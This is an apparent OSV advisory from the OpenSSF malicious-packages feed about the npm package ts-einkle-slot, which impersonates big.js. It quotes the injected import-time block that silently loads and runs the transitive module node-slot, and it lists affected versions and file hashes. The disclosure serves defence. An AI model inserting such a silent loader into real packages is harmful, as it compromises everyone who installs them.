{"id":"MAL-2026-6525","summary":"Malicious code in ts-einkle-slot (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b)\nPackage is published as `ts-einkle-slot` but its tarball contents (source, README, LICENCE, package.json author/repository/description) are copied verbatim from Michael Mclaughlin's legitimate `big.js` package, presenting a spoofed publisher identity. The CommonJS and ESM entrypoints (`big.js` and `big.mjs`, referenced from `main`/`module`/`exports`) contain an injected top-level block: `try { const doc = require('node-slot'); doc.from_str().then(e =\u003e {}).catch(e =\u003e {}) } catch (error) {}`. This causes the transitive dependency `node-slot` (pulled in via the declared `ts-einkle` dependency) to be loaded and its `from_str()` invoked the moment any consumer `require`s or `import`s this package, with errors silently swallowed so the host package keeps functioning as a drop-in big.js replacement. The package's advertised purpose is decimal arithmetic; there is no legitimate reason to load an unrelated `node-slot` runtime module on import. 
Installer harm is delivered by the attacker-controlled transitive `node-slot`, which is pulled into the install tree solely by virtue of installing this package.\n","modified":"2026-06-27T19:46:39.237574074Z","published":"2026-06-26T14:15:58Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-007605","source":"amazon-inspector","sha256":"f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b","versions":["0.0.8"],"modified_time":"2026-06-26T14:15:58Z","import_time":"2026-06-26T14:59:21.307992564Z"},{"id":"IN-MAL-2026-007683","modified_time":"2026-06-27T15:46:43Z","sha256":"410ddc78002637af895c433fbefd95d70bfaa2b35f761e51bf4ea77e1a0aec65","import_time":"2026-06-27T15:57:49.062065643Z","source":"amazon-inspector","versions":["0.1.0"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007682","source":"amazon-inspector","sha256":"ebcd03f4867c803e5fe72f1bd4005bd51a3b441ba6bbc8ebec1a72af5dfa083e","versions":["0.0.9"],"modified_time":"2026-06-27T15:46:35Z","import_time":"2026-06-27T15:57:48.996183141Z","ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007687","import_time":"2026-06-27T19:35:56.0374892Z","sha256":"5811ddfd53f327bf98d44c5903c7ddb009a05689cd172688e5bd5cbbaaf62eb2","source":"amazon-inspector","modified_time":"2026-06-27T19:13:34Z","versions":["0.1.1"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]},{"id":"IN-MAL-2026-007686","import_time":"2026-06-27T19:35:55.909734348Z","sha256":"90d45cca3c7e05f5c9af46b98cec23a8d0971fdb9c83c5f120d0ca4767bda0b9","source":"amazon-inspector","modified_time":"2026-06-27T19:13:22Z","versions":["0.1.2"],"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}]}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.0.8"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.0"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.0.9"},{"type":"PACKAGE","u
rl":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/ts-einkle-slot/v/0.1.2"}],"affected":[{"package":{"name":"ts-einkle-slot","ecosystem":"npm","purl":"pkg:npm/ts-einkle-slot"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["0.0.8","0.1.0","0.0.9","0.1.1","0.1.2"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ts-einkle-slot/MAL-2026-6525.json","cwes":[{"cweId":"CWE-506","name":"Embedded Malicious Code","description":"The product contains code that appears to be malicious in 
nature."}],"indicators":{"evidence_files":[{"sha256":"442c54a9b0beff03159cb7dd3a59ad1c09dbe09f0bcec91df0a33a032a2e4f99","tlsh":"c6c2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc","path":"big.js"},{"sha256":"37d3f81086dd78148676abfcd8858197a146ff8d91f1ca2d10f62159a32640d2","tlsh":"5ec2658c3ac67579593363788f465088eb38525712c8b286b4ae63b46f78cb107b5fdc","path":"big.mjs"},{"sha256":"74c66314db3fc39413c66b3abd50304d7969e1715c6dfabf799ab0fe938e62e0","tlsh":"ea210463c9e19da70af85ba47cac43a9f1161b1f40a04c5bb07b131c5f3345b2095b7d","path":"package.json"}],"package_integrity":[{"hashes":{"sha512_sri":"sha512-Nc2yiowLUS+K5fgbw5I+243QO2DPvOmwWUM6isWsw1+x30muc1zP5mAWS+aKFJfEP+uhzXGb3kMwQF+thUU+xQ==","sha1":"a6e7d2ef2de53501dea40b179e73a4af7d1df286"},"filename":"ts-einkle-slot-0.0.8.tgz"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}